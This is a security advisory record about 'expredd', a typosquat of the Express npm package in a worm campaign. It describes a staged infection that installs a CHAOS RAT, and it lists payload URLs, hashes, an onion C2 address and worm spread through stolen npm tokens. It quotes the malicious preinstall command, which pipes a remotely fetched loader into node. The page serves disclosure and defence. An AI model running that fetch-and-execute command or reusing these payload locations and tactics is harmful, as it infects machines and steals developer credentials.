VDB
GCVE-110-OSM-2026-12718
GCVE-110-OSM-2026-12718
Advisory PublishedCVSS 9.6/10
Typosquat of the legitimate Express web framework, part of the CHAOS Worm campaign. The package was published 2026-09-29 by npm user 'dirtyblanket' (disposable email s7dwzxru4z@ooynib.com) and impersonates Express v5.2.1. On install, its preinstall hook curls a Node.js loader from Web Archive and pipes it into node, kicking off a multi-stage infection that installs a Go-based CHAOS RAT persisted as a fake systemd font service and worm-propagates by republishing infected packages using stolen NPM_TOKEN values from victim .npmrc files.
=== STAGE 1: npm preinstall hook ===
Malicious payload found in: package.json (preinstall script)
Behavior: 'curl -s <web-archive-mirrored-loader> | node' — fetches Node.js loader via Web Archive to bypass simple URL blocklists.
=== STAGE 2: Node.js loader ===
URL: https://codeberg.org/hellscripter/install-scripts/raw/branch/main/node.js
SHA256: e255d473e13f6bfb8c594ff5eb459cf1441983fe0424ab2623d79286331fd33d
Behavior: Downloads and executes linux.sh installer.
=== STAGE 3: Linux installer ===
URL: https://codeberg.org/hellscripter/install-scripts/raw/branch/main/linux.sh
SHA256 (archived): d6d78ef8ed8bd6d77e1b871e3ce0a0c5e5929af02aee29ba8d94e5067f2aca12
SHA256 (current): 65f0a95b24e30305146346cbc2452cfabadab9e1ca35053e1134b67c38919577
Behavior: Installs Tor from dist.torproject.org, drops the RAT, creates immutable systemd unit.
=== STAGE 4: CHAOS RAT backdoor ===
Installed as: /usr/lib/systemd/systemd-fontrenderd (root) or ~/.config/systemd/systemd-fontrenderd (user)
Service unit: /etc/systemd/system/systemd-fontrenderd.service (chattr +i, immutable)
SHA256: 2c9dbc14809f1e1aebda114194368b002acf74c8760b88fc101f625d179793c2
C2: s5n2uyo6gb6dhirsm5pihwohi6e7ayrwojx4xjow4cqabmbowpezenid.onion:80 via SOCKS5 127.0.0.1:9050
Hardcoded JWT: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdXRob3JpemVkIjp0cnVlLCJleHAiOjE4MjIxODY3NDAsInVzZXIiOiJkZWZhdWx0In0.GHbQBnnVuyBd5QEE9HCu0lY9CU3NhYo38SdVQvs729k
Capabilities: interactive shell, screenshot, arbitrary file read/write/delete, directory browsing, reboot/shutdown, worm propagation via stolen npm tokens + SSH known_hosts (BatchMode=yes) + AUR PKGBUILD poisoning.
=== HIGH-FIDELITY PACKAGE MODIFICATION BUGS ===
Preinstall scripts begin with '{} & curl…' with original commands wrapped in escaped quotes ('"node build.js" & …').
Publisher: npm user 'dirtyblanket' <s7dwzxru4z@ooynib.com>
Weaknesses (CWE)
CWE-506Embedded Malicious Code
Risk Scores
CVSS 3.1
9.6/10
Critical · CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H
Affected Products
| Vendor | Product | Versions | Platforms |
|---|---|---|---|
| unknown | expredd | all (affected) | — |
Browse GCVE Records
3,112 records in the GCVE database · Updated October 5, 2026
No matching records found.
Explore Further
Investigate this vulnerability in the interactive console or download the raw GCVE record.